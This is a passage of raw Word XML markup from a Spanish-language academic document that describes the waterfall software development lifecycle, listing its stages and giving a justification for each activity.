        <w:t>El ciclo de vida inicialmente propuesto por Royce en 1970, fue adaptado para el software a partir de ciclos de vida de otras ramas de la ingeniería. Es el primero de los propuestos y el más ampliamente seguido por las organizaciones (se estima que el 90% de los sistemas han sido desarrollados así).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Este es el más básico de todos los modelos y ha servido como bloque de construcción para los demás paradigmas de ciclo de vida. Está basado en el ciclo convencional de una ingeniería y su visión es muy simple: el desarrollo de software se debe realizar siguiendo una secuencia de fases. Cada etapa tiene un conjunto de metas bien definidas y las actividades dentro de cada una contribuyen a la satisfacción de metas de esa fase o quizás a una subsecuencia de metas de la misma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Etapas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Planeación del proyecto </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Ingeniería y análisis del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis de los requisitos del sistema </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Diseño </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Codificación</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Pruebas </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Mantenimiento  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6D4FC25A" wp14:editId="27DFDED9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>329696</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6666865" cy="7115175"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21571"/>
                <wp:lineTo x="21540" y="21571"/>
                <wp:lineTo x="21540" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="46" name="Imagen 46"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rotWithShape="1">
                    <a:blip r:embed="rId100">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="3185" t="14046" r="16278"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6666865" cy="7115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16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ciclo de vida en cascada (waterfall) ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16AC2" w:rsidRPr="00F16AC2" w:rsidRDefault="00F16AC2" w:rsidP="00F16AC2">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F16AC2">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc514520857"/>
      <w:r w:rsidRPr="00977053">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Justificación de las actividades del proceso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8"/>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="63" w:after="252"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>El arquetipo del ciclo de vida en cascada abarca las siguientes actividades:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Planeación del proyecto:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>La gestión de proyectos de tecnologías de información (TI) es el proceso de planear, organizar y delimitar la responsabilidad de la realización de las metas específicas de TI de una organización</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="6C6C6C"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Justificación</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">: Para iniciar un proyecto de es necesario la planeación del mismo pues como se menciona anteriormente debemos tener una total organización de los diferentes recursos con los que cuenta el proyecto además de delimitar el desarrollo del mismo y la meta final, además de la finalidad del proyecto, es decir si se va a resolver un problema, aprovechar una oportunidad o dar respuestas a ejecutivos.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ingeniería y Análisis del Sistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: Debido a que el software es siempre parte de un sistema mayor, el trabajo comienza estableciendo los requisitos de todos los elementos del sistema y luego asignando algún subconjunto de estos requisitos al software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Justificación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esta etapa es necesaria pues de esta parte comienza el análisis profundo de los sistemas tanto el que se va a desarrollar y el en donde se va a implementar una vez que el proyecto finalice.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Análisis de los requisitos del software</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: El proceso de recopilación de los requisitos se centra e intensifica especialmente en el software. El ingeniero de software debe comprender el ámbito de la información del software, así como la función, el rendimiento y las interfaces requeridas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Justificación</w:t>
      </w:r>
      <w:r w:rsidR="004E13BA" w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: Esta</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> parte es una de las </w:t>
      </w:r>
      <w:r w:rsidR="004E13BA" w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> importantes en el desarrollo del proyecto pues se realiza la recolección de los requerimientos es decir investigar con el cliente que es lo que quiere y plantearle la posible solución a su solicitud.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Diseño</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: El diseño del software se enfoca en cuatro atributos distintos del programa; la estructura de los datos, la arquitectura del software, el detalle procedimental y la caracterización de la interfaz. El proceso de diseño traduce los requisitos en una representación del software con la calidad requerida antes de que comience la codificación.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Justificación</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta etapa es más importante aún que la anterior en cuestión del seguimiento del ciclo de vida, pues en esta etapa se diseña la base de datos, sus relaciones y operaciones, también el diseño de las interfaces o vistas del software.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Codificación</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: El diseño debe traducirse en una forma legible para la máquina. Si el diseño se realiza de una manera detallada, la codificación puede realizarse mecánicamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Justificación</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">: En esta etapa comienza la construcción en cuanto a código del software pues sin </w:t>
      </w:r>
      <w:r w:rsidR="004E13BA" w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>él</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> no </w:t>
      </w:r>
      <w:r w:rsidR="004E13BA" w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>sería</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> posible el desarrollo del proyecto. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Prueba</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: Una vez que se ha generado el código comienza la prueba del programa. La prueba se centra en la lógica interna del software y en las funciones externas, realizando pruebas que aseguren que la entrada definida produce los resultados que realmente se requieren.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Justificación</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">: Esta etapa es necesaria pues una vez que se codifica es necesario probar lo que se programó, saber si es lo que se esperaba o si esta correcto así podremos saber si esta os desarrollando lo que el cliente solicito.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA02C8" w:rsidRPr="00DA02C8" w:rsidRDefault="00DA02C8" w:rsidP="00DA02C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="240"/>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
